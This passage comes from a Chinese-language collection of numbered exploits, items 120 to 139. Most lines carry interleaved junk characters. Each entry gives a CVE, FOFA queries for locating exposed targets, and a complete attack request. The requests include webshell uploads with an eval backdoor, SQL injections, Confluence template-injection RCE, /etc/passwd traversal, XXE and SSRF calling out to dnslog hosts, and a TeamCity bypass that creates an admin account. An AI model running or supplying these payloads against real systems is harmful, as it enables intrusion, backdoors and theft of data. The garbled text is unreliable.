, L+ U# z) d5 _. fX-Remote-Addr: 1.1.1.12 \+ t4 y6 L o1 E
Te: trailers
- E! E) K+ E$ B7 U7 h4 eConnection: close# X" ^; v2 |) v& y8 X
- u" x& E, i1 D7 y2 J, d
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456; G6 n. g% D3 ^
7 E# B( L% {) v+ C( J, w, V% O$ s0 Y! q. X! W9 p
120. 北京百绰智能S40管理平台导入web.php任意文件上传
. ~, G( Z3 M- F# W& NCVE-2024-1253
3 e" P- ` \5 m# J1 y# nFOFA:title="Smart管理平台"' [) I* }3 K' N$ a/ D) J) K( w2 l- r
POST /useratte/web.php? HTTP/1.1
# u8 b. o/ L: x, C# n" _+ W; NHost: ip:port& P+ U4 E6 Q; }0 K; C2 S
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db! M6 b2 y" b7 s4 w! {, H; ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko+ b7 K. M* B- ^: F) ^. z% [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ j+ d5 [, _* U7 ^3 ~1 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: _- O/ L4 ^5 {Accept-Encoding: gzip, deflate* O6 [% d, C" i4 z% `
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
# T. K2 f5 U2 |% N, v: c) w* W$ D# tContent-Length: 597
9 k2 _/ F L0 FOrigin: https://ip:port% m6 h. w: R1 V4 Z
Referer: https://ip:port/sysmanage/licence.php
+ ]6 n4 h: {, d0 hUpgrade-Insecure-Requests: 1
' I; V% m& P- [9 R' T; f; t5 DSec-Fetch-Dest: document
6 v9 V. M2 s9 R8 a3 e5 z; V+ W |+ XSec-Fetch-Mode: navigate
) i% G! L+ V. Q0 @; ?Sec-Fetch-Site: same-origin
( t5 P/ T+ r' `" t# F6 u/ ^Sec-Fetch-User: ?1
% l9 f$ m+ t( Q/ O2 ?8 r3 ]Te: trailers1 o# U' Q6 i% P" v. X. G
Connection: close
( f' _4 i& b# P8 s0 O8 `$ F- Q' S
6 |" d+ B0 r$ d& ~* |-----------------------------42328904123665875270630079328+ L9 T8 ?* c7 d: ^
Content-Disposition: form-data; name="file_upload"; filename="2.php"+ a4 n5 R& j3 ^7 a% K
Content-Type: application/octet-stream
0 O8 c6 w* n: ?# Q+ c) d a: j ~) ]) K+ X
<?php phpinfo()?>
% @7 x( `3 I+ n; u% k$ }3 w-----------------------------42328904123665875270630079328' y& G6 _5 [, P) v& p9 m
Content-Disposition: form-data; name="id_type"
1 l Z& h% ~) v
/ S# i1 N& v& e1
# \ ?# c6 F( P# j. L+ K" J-----------------------------42328904123665875270630079328, }' x; j7 ~$ o$ s
Content-Disposition: form-data; name="1_ck"
) h- l% p. h" k \4 x M- O* i
0 D; p- y& q7 n: C9 q ?1_radhttp
! Z5 N( p$ d' D4 g+ q-----------------------------42328904123665875270630079328
0 p/ [0 D; Y9 @9 T1 f$ |( x) V/ FContent-Disposition: form-data; name="mode"; P$ d2 }% H. f$ t d$ q
3 Z% K1 X) V% c( @7 d
import4 K- h) D' }7 x& Z, c! K# e
-----------------------------423289041236658752706300793286 N" s) e2 D$ ^( {4 ]6 B
( W, R7 L9 y- i% n
! n7 r3 G% B& m: L文件路径/upload/2.php& }4 D' x, q) m
2 o' f* D! U& n3 n
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
8 @' T$ Y* O7 D b, ?# XCVE-2024-1918
: X. f& N# C6 A: j# M U+ MFOFA:title="Smart管理平台"* U' z. V! K5 Z9 _1 O) |, l$ M
POST /useratte/userattestation.php HTTP/1.1/ j3 A; Q! Y# {
Host: 192.168.40.130:8443
8 Y) u3 Y8 z. p; N. S) oCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac508 C" _& |' \4 g S
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko7 [( P' U9 }3 T0 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* ^( b* V4 f9 U! f$ s8 e# o DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ D( d4 V+ ?; l! D) \, I
Accept-Encoding: gzip, deflate
) w; a6 P, f" R3 Q: ]Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328! j8 A/ O# Y9 O6 z) h
Content-Length: 592
$ S6 n. I0 h/ V4 f4 r" \Origin: https://192.168.40.130:8443+ u" `7 z* j8 ?$ j) s' ~
Upgrade-Insecure-Requests: 1
0 Q$ |" y7 C; w& wSec-Fetch-Dest: document/ h+ p4 q* u4 Z$ r: A( t8 U5 P. n
Sec-Fetch-Mode: navigate- G: z& y6 a/ P
Sec-Fetch-Site: same-origin
. x( {$ G( l8 G N3 ]Sec-Fetch-User: ?1 G8 ]( O, B- p8 E9 e: U
Te: trailers/ o5 t* V+ {" D5 p" j5 s
Connection: close
+ D0 R: S" }$ ~: T, G, X+ r4 Y6 B5 z, ]- H8 K
-----------------------------42328904123665875270630079328% `, J% p9 s: g" M! L
Content-Disposition: form-data; name="web_img"; filename="1.php"! k5 [6 w$ k# Y$ b5 p! I
Content-Type: application/octet-stream
8 T. p6 F5 n/ B8 f1 Y( Q# v: O' @3 e/ q, ~6 k. K& u6 e
<?php phpinfo();?>, K) t0 Y/ V% r" s. \1 m
-----------------------------42328904123665875270630079328
1 S" a" I- N2 e" A4 B) k/ wContent-Disposition: form-data; name="id_type"4 Y- l7 D1 X, k: h+ o0 h8 ?
8 C" M+ B1 Q' h0 F7 G# |0 V1
. z/ o# O1 ^6 r6 X-----------------------------42328904123665875270630079328
, d1 ?* }, w" AContent-Disposition: form-data; name="1_ck"
, J' C0 B$ K0 v ^# J4 u; |
4 R# @ D+ a& q! b6 }8 G7 i' p* x1_radhttp0 v( w$ |4 C0 D8 [. A
-----------------------------42328904123665875270630079328
2 q* V; h: N* W( yContent-Disposition: form-data; name="hidwel"6 }3 N+ O6 o; W( J4 t9 s
0 k2 g' @9 q' C$ S, a# sset: w* M. F ?+ v- R2 l* a2 K
-----------------------------42328904123665875270630079328' e& A! [, f# F3 J1 i' I
% X5 T. ~( S* w" `7 J8 Q
* ]$ D/ G) m* J' K, B0 ^
boot/web/upload/weblogo/1.php8 w- T) d2 U& x
6 T) B" j: I. U# x, h* s122. 北京百绰智能s200管理平台/importexport.php sql注入( l9 K" I8 u% {* R& }. e2 f
CVE-2024-27718FOFA:title="Smart管理平台"
- U7 j! Y1 n/ H0 J2 n其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
4 t4 I! b% e3 {0 eGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
J, L- `- E$ Q# m% r) JHost: x.x.x.x
' [$ a7 }; e; y) F) h+ g# pCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
) R/ Q+ j2 w) J& L& DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" ?3 X% `3 ]2 h7 e6 ~7 e9 f* i. EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( m3 {" a% M8 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 M; D% u! U3 S; {$ o FAccept-Encoding: gzip, deflate, br
, _. F0 a7 Y, |5 aUpgrade-Insecure-Requests: 11 r1 ]! F9 u$ O+ l
Sec-Fetch-Dest: document" u. a% Z7 v5 b7 o3 m- |
Sec-Fetch-Mode: navigate
7 w( k: t0 E4 U. X GSec-Fetch-Site: none
; Z& Q! R2 @+ Q. D. [; kSec-Fetch-User: ?1
9 R: N3 Q3 `7 e; K( XTe: trailers8 ^# c7 }4 b+ s+ O7 Q
Connection: close8 T) ^4 b4 ?4 y, O1 J* t
6 w% v: L; [/ U6 a8 j
% d0 S5 J2 N' p: L123. Atlassian Confluence 模板注入代码执行0 D5 D+ c E/ J6 C2 o7 e& r. w
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"- M& j# U c* t9 a) u
POST /template/aui/text-inline.vm HTTP/1.1
B; N1 @" G( l% eHost: localhost:8090
7 z7 d- T3 B. y% C v/ uAccept-Encoding: gzip, deflate, br b8 q9 A: p2 F9 }
Accept: */*8 L$ F2 S; d% A; f4 ~
Accept-Language: en-US;q=0.9,en;q=0.8* t+ c$ \8 Y( A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
; h0 M; h$ O, c- K, s1 WConnection: close
2 m2 I$ ], Y7 V; N9 |# xContent-Type: application/x-www-form-urlencoded' N1 _: Q' p2 B- V2 I5 Z( ~
* r+ S* v: ?6 C' x
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
- @# q% K G/ O0 v0 L( k9 t# N$ x6 m+ @
6 D* {+ k. i" }+ i; k8 p3 \4 O
124. 湖南建研工程质量检测系统任意文件上传
* W$ X3 Z, K; [$ \FOFA:body="/Content/Theme/Standard/webSite/login.css"9 D6 v' c* b7 g$ ? y
POST /Scripts/admintool?type=updatefile HTTP/1.1
' b4 p, E; ~9 g4 A- l" ]* w/ kHost: 192.168.40.130:8282
# W3 B! ]) q9 o7 |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' B9 [9 [6 J( g6 ?+ n; n
Content-Length: 72, _* X1 w/ v/ u+ ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.87 F3 O7 x. t+ t y' n5 m! S
Accept-Encoding: gzip, deflate, br: I& O: f6 Z) }% H" O7 k' Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 S, g& c4 E% |7 X" Z! N( p
Connection: close: K, c" c+ g9 u- v" b3 w/ J
Content-Type: application/x-www-form-urlencoded6 }/ O9 g v$ J/ Y' Y# _: U; V
4 u" g' a3 x, l; \0 B; K; y* U# W0 w
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>+ E* C. y# R0 M0 k5 c8 j$ @
# D Z" l5 `1 r$ x X5 g- N
3 ]$ x9 a5 X Y2 p6 m& Y* X
http://192.168.40.130:8282/Scripts/abcgcg.aspx
3 [* N( O* r0 ^0 L/ ~5 |9 ~3 U
6 {; C+ W. f- H- K, W125. ConnectWise ScreenConnect身份验证绕过
2 V8 R) l" h0 q% e2 ?, ]CVE-2024-1709' F; }2 b' R8 g7 n5 S
FOFA:icon_hash="-82958153"+ a4 ?1 n5 m+ p Z2 k1 l, j; M
https://github.com/watchtowrlabs ... bypass-add-user-poc
" U2 K! l U6 U5 a) \8 j. {5 O/ U+ l1 { E
$ X8 J+ R7 P# r% G1 A# ^使用方法! C0 s& p; z% _$ h+ a: \
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!2 c/ N0 K) i3 ?; C( c
+ H8 v2 F- h$ G3 E9 l3 E' z4 a0 d% ^! a5 e
创建好用户后直接登录后台,可以执行系统命令。
' r6 ^: \0 g' Y5 I, o/ j# x2 }0 E$ [
126. Aiohttp 路径遍历# N* g: n! p3 Z- \+ ^8 h& t
FOFA:title=="ComfyUI"
( P- S, T. A: ^& @' e% mGET /static/../../../../../etc/passwd HTTP/1.1
% v2 _* t3 w. h7 ~' BHost: x.x.x.x
_; A6 d7 j3 G9 {* C. c7 \& SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
2 g4 z$ I; [, y) cConnection: close+ B% e; Y/ P7 z
Accept: */** v/ M e9 _ G* a8 F: F
Accept-Language: en1 r" m! z$ a" D
Accept-Encoding: gzip8 N- C3 Z/ c( V+ c7 H: s2 {
6 ~% O6 j! k8 ^7 p! @5 i1 D' z1 g
$ p2 c, U* J2 x! P! T
127. 广联达Linkworks DataExchange.ashx XXE2 x' ~6 M, O& ]* G; K+ N, N: t
FOFA:body="Services/Identification/login.ashx"
* {6 X2 C5 U3 G4 LPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
" d. N$ s- V( `! bHost: 192.168.40.130:88887 o2 V9 _' L( D7 |; W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
/ F% x6 U- b( l, ]: K+ q% XContent-Length: 4159 [5 \1 u( G; k% y) w8 a' Y; Z7 u7 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 w4 M# w' j; Q2 a8 `
Accept-Encoding: gzip, deflate% X0 L w" [& j- \
Accept-Language: zh-CN,zh;q=0.94 X, T$ N; J& \0 _% ~' ?
Connection: close
3 X: O7 i, Y! P. X- JContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0) U1 {7 t9 Y. N' U- v% Z7 S
Purpose: prefetch; U0 b: [8 L* k$ d" B
Sec-Purpose: prefetch;prerender8 w6 [4 y7 ?# b7 E5 I
! y% q6 N+ w; ?5 b/ b------WebKitFormBoundaryJGgV5l5ta05yAIe0
6 h! e% ?4 q; v/ X: ~Content-Disposition: form-data;name="SystemName" `0 G) s# s9 O) ?& V7 o
, v N9 i5 {( w
BIM
+ b3 {" d5 }6 }/ ?------WebKitFormBoundaryJGgV5l5ta05yAIe0
; v) u8 l% H( U# ZContent-Disposition: form-data;name="Params"
: h. w7 T% X' E( L4 r/ |, _6 \! Z, K4 EContent-Type: text/plain' Q" H3 K ^2 q( ?7 [! {# R L& M5 H' \
, W+ ^9 |, l/ e5 W& Y<?xml version="1.0" encoding="UTF-8"?>9 f$ D5 f e) d8 Z4 B! y6 P
<!DOCTYPE test [) @* v# Y1 I3 F: K
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">+ K; H, n/ ^$ Q
]2 M. d3 `0 K1 b! [0 q% c4 x
>2 P, K$ {. P0 r' V
<test>&t;</test>
* S7 U6 \9 r* W------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% [. w% }% u6 G$ y0 s6 W
0 ]; A) k& y* Z, d. _. o# j' S, x, D4 ^! w7 y9 F
$ r! j1 w& d3 n6 ]
128. Adobe ColdFusion 反序列化
% q6 N) k, Z6 x0 U9 w9 w5 |CVE-2023-38203 k6 |9 _& E# O6 o
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)1 Z, a+ M2 U4 r$ y
FOFA:app="Adobe-ColdFusion"
0 e+ [3 x: N; g" tPAYLOAD1 O' d) z' x- _1 ^5 a
( Y& m$ T" V4 A3 b/ V; D
129. Adobe ColdFusion 任意文件读取: s2 \, k7 J" d% h' h) D9 u- P
CVE-2024-20767
" I/ E5 N) ~8 ^' RFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
. w5 C( [# ]: e3 ~0 z) s第一步,获取uuid; m- U/ t; ~4 b6 L: \
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6 ~# a5 }; G7 f* ]Host: x.x.x.x: v2 {/ J1 `- a) t- x6 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36/ q+ K4 |6 `. ~7 A4 H
Accept: */*
( V" H7 T, H( X |/ z* V6 qAccept-Encoding: gzip, deflate0 W. }/ {) {6 L
Connection: close* e# W0 D0 O) F" e z6 d; Z
' [4 Y1 B+ u. u% _/ U% R
C1 y2 B. p9 F& n ]第二步,读取/etc/passwd文件
4 H; u8 f" B, HGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
3 D1 U( a" x1 a* k- l1 nHost: x.x.x.x0 k4 |2 P5 n3 M6 l% W" D8 Q1 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" Y! ?& |! T4 ]; B- k5 B( CAccept: */*1 v0 `$ T, ~$ X/ d% B" Q+ ~) {7 n
Accept-Encoding: gzip, deflate. _% d2 ~9 Y/ W- [3 S
Connection: close
) M; T) I- p' z B* b& G+ q. yuuid: 85f60018-a654-4410-a783-f81cbd5000b98 z& L. p) n! K/ @
1 J$ @" Q( s; Y4 |9 L
' E" n G+ i6 `: y9 z) B: ?0 l130. Laykefu客服系统任意文件上传
3 x3 s& H+ s4 P+ k: DFOFA:icon_hash="-334624619"( Y8 e: S, n7 F2 V
POST /admin/users/upavatar.html HTTP/1.1) j( u) T& ]. }
Host: 127.0.0.14 \9 J9 @0 M+ U: v9 P& w% G
Accept: application/json, text/javascript, */*; q=0.01
' M9 H, V3 k( m0 IX-Requested-With: XMLHttpRequest
; ]1 S! f+ C( |- m" jUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26# I+ J' h; e @. ], [' Q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR8 u# B% B) O# c7 x7 i# V) G
Accept-Encoding: gzip, deflate
1 M7 N; t2 `; d& C4 N9 _Accept-Language: zh-CN,zh;q=0.9. {" c: ~- ?& Q. J5 L. m
Cookie: user_name=1; user_id=37 U4 B5 L. N4 l+ G5 U& x
Connection: close& ?/ c- K; d) A0 z6 O# i
. r. Q1 }* e5 `: T------WebKitFormBoundary3OCVBiwBVsNuB2kR3 o/ K4 Y: @+ H
Content-Disposition: form-data; name="file"; filename="1.php"
, M+ j* E) n4 a3 }2 n5 ZContent-Type: image/png
9 ]9 u+ I+ h/ |8 ^! O, m! a8 U. z9 M- ` ; e# k- J5 g+ E
<?php phpinfo();@eval($_POST['sec']);?>
* i9 a7 I4 q7 P------WebKitFormBoundary3OCVBiwBVsNuB2kR--+ }" b" ?& ]# {' ]) m7 x' n i* d
5 K% Y0 D6 N& J# B) J
$ b* N6 W: i/ N2 K0 r" k131. Mini-Tmall <=20231017 SQL注入5 T5 o' Y$ j4 V8 G; {. O2 N/ o
FOFA:icon_hash="-2087517259"
( G, [+ R' {: v- J f3 ^8 ~后台地址:http://localhost:8080/tmall/admin
6 ?- c' w5 y. r$ Z- Yhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
8 T3 u( U) Q' N* X
3 b" a; R$ J8 w132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过! p' y$ N7 t/ S8 z% F3 K" _
CVE-2024-271983 ]$ [9 ]. |9 L, v" N( m7 B- h
FOFA:body="Log in to TeamCity"
1 i5 h- ~, E$ `: l. C. }$ W2 ?# oPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
& a: l/ y) S" q- w+ Y& |3 f E7 ?Host: 192.168.40.130:8111, o$ e0 F' L5 h2 Y3 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( T. C6 k3 j: o8 i+ N& f$ AAccept: */*
) J! E5 y( [. i& QContent-Type: application/json. C$ l9 p' E+ T3 B
Accept-Encoding: gzip, deflate. @& K) k8 I5 ~6 T+ u# r
" c2 A3 @/ A6 u8 z0 e8 J$ v8 {) {{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
/ s5 k; d" R8 h& N# E/ R
5 E' Y5 \- x' K5 E- y$ b* I
( t1 T/ T8 C# C3 J# rCVE-2024-27199. v* q1 _* i A1 L3 |
/res/../admin/diagnostic.jsp
0 Z5 z% H3 p7 h/ I, f. @, X5 x6 j/.well-known/acme-challenge/../../admin/diagnostic.jsp; M# u( i2 x% [" i o; G3 l
/update/../admin/diagnostic.jsp" l% }* Y9 S9 J/ d% f( O l
' b5 v) `: e4 O" K; U( R y+ L, y& n$ y) A, L) y' u' p
CVE-2024-27198-RCE.py
! `$ g+ [5 y7 M' ^' o* K. R3 F3 h
133. H5 云商城 file.php 文件上传
+ ~; S. L1 E- E9 Z: z6 s' _; SFOFA:body="/public/qbsp.php"" q9 l2 Z) R/ \9 k% }: i( @; g$ D
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
9 y$ l( z/ W+ sHost: your-ip
! ~! |. _3 k9 j0 K6 U9 _# wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! U: q2 j1 a& @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
& L S. C7 ?# {% p" s# Z/ l& W" i9 b4 |: O$ C R
------WebKitFormBoundaryFQqYtrIWb8iBxUCx* @: ]1 u3 W3 S9 l% {
Content-Disposition: form-data; name="file"; filename="rce.php"
4 \ z9 |+ ]8 `* o3 O" KContent-Type: application/octet-stream
- ~& Q3 |6 g/ w* e 4 f! z6 x# O% B' W( |
<?php system("cat /etc/passwd");unlink(__FILE__);?>3 j% N/ _! m$ @' k
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
* z& D; O5 a8 e
+ z3 w- D6 K0 ^) q0 f
, g: j/ _8 X4 C5 D2 l M& }0 {' t1 z+ |' a+ v. f1 ^
134. 网康NS-ASG应用安全网关index.php sql注入+ E! K( k% n5 c% v ]& H# A
CVE-2024-2330
) j& ?9 F3 C& SNetentsec NS-ASG Application Security Gateway 6.3版本3 Z( G# | P. d9 x" ~) l; K. A
FOFA:app="网康科技-NS-ASG安全网关"3 x# G! p$ N* E6 ~
POST /protocol/index.php HTTP/1.1
5 L( r4 [! a$ v% X4 Z0 p" `Host: x.x.x.x2 z+ _# k4 X! A( U2 m
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de8 S1 p8 y+ m* C4 R# o8 r4 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
9 g2 L' F& `2 |8 g# e) _Accept: */** J+ u1 S3 ~' h! B" v# [7 U0 e) K3 i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 j2 C. P U( _ ^
Accept-Encoding: gzip, deflate
; T& J! c# B8 c5 V! t8 `: DSec-Fetch-Dest: empty/ [# D' W/ c; o. u, f2 k
Sec-Fetch-Mode: cors5 t K. c+ Y& ]& b& x3 W
Sec-Fetch-Site: same-origin; S3 I- v; n! j1 P+ U0 ?
Te: trailers
( Z6 f+ B% V# |& U. a* J' l) \Connection: close
3 B; a" W7 k9 c( e1 G$ R9 B& FContent-Type: application/x-www-form-urlencoded
7 F6 u& w( s5 eContent-Length: 263, v! j8 o# ^4 E, ?7 Q; h
: o2 s7 E% H" m% N7 d
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}3 T! S4 m$ X- U7 Y: M) g
: f/ R8 ~/ @( m8 d8 a9 h
6 n$ Q9 \7 b" E z* H, P135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
$ w3 k5 {: [1 B h0 L7 gCVE-2024-2022
8 k7 Z$ K. P% I& U4 R0 W7 H0 A* w! nNetentsec NS-ASG Application Security Gateway 6.3版本
# A6 P" L# O. x9 f6 vFOFA:app="网康科技-NS-ASG安全网关"
( `7 S5 L- ?" N8 f: a1 u, l. J8 X- qGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
8 r+ T! Z- h- u* ZHost: x.x.x.x
! F( N8 p1 B8 c2 O$ y( CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& A# V% b, d. ?3 b2 N( [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 a4 ~" T- G8 Q8 BAccept-Encoding: gzip, deflate
- a, P5 `7 v3 @( xAccept-Language: zh-CN,zh;q=0.90 F. }, b: }, a! m4 J2 X9 P1 G- t
Connection: close7 ~& U8 Q$ ?- X1 R# J1 r5 y( W
) }% ~( }$ z0 {' Q6 `& X- l! M! H
0 U* @2 s9 B+ g: l2 h) ?136. NextChat cors SSRF
/ }0 K# a5 r$ b! j1 y5 ?! m" w" ?* zCVE-2023-49785, {. y5 R# {0 ?1 R8 h
FOFA:title="NextChat"3 @4 i% ^* B6 F( R! ^, w5 u. y- f
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
% y; t4 }3 q/ i4 f$ X- @6 lHost: x.x.x.x:10000+ {! j L4 b. a6 d. ^7 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ Q) T$ \1 s' g/ E l
Connection: close$ f# h ?' E0 u2 y, E
Accept: */*
1 i0 |! }* V6 }1 D( { n1 X3 l1 |Accept-Language: en
0 f; \0 Z4 O" W2 n8 SAccept-Encoding: gzip. p/ V+ p+ \. s; d# m
+ E: e/ W: t. S4 @. `
. Q2 v: `9 D2 e" V9 Y! o$ l) b137. 福建科立迅通信指挥调度平台down_file.php sql注入
4 _/ L) d( h" f' r# HCVE-2024-26203 `+ ^# K7 k8 M2 ?2 s
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 i+ f$ I; X$ B9 M* w$ W- rGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
U& D0 D( H) Z. x) u b; wHost: x.x.x.x
! A# r& B: O0 `5 O2 u: NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) W- T n2 I9 }8 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- e+ U. a: @0 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 J3 q9 k! D9 l v0 X8 W/ R1 V
Accept-Encoding: gzip, deflate, br1 H* E- l+ F% M0 C( t
Connection: close
# X& I& Y$ G) g& c+ U$ m. z% F3 q7 U% kCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
# u8 ~! s) B, H, q2 B+ DUpgrade-Insecure-Requests: 1
+ k% j& g# B; Z0 p
! F' ^/ }0 |& E% {3 j, E4 Y. D2 j" n2 f5 x1 n3 S* j0 S9 ~
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入- ~3 B8 H$ Q: x4 f# w( r/ r7 H* c
CVE-2024-2621( N' M' M! o( g" p2 L. P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 R+ |$ V. }' ]% t) ?2 I2 S& cGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.10 C; m2 n7 t3 A
Host: x.x.x.x3 J0 c& j# E: ?, J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% Y+ r* s# w2 ^; `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 ]. K: z" B3 v- f: n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 ?. p, z$ e7 zAccept-Encoding: gzip, deflate, br
) q; d" R! e9 X _8 }Connection: close. s) n$ K* o& B7 B$ E
Upgrade-Insecure-Requests: 1) N0 A, G' S( s3 T/ l L+ R+ {
9 l( F8 C! L* h
4 \" I1 B" c/ s7 `# I' d1 ^139. 福建科立讯通信指挥调度平台editemedia.php sql注入6 V/ X; F: k2 B6 v t( r4 h
CVE-2024-2622
. h( Y+ x" h x, r8 \- S) aFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
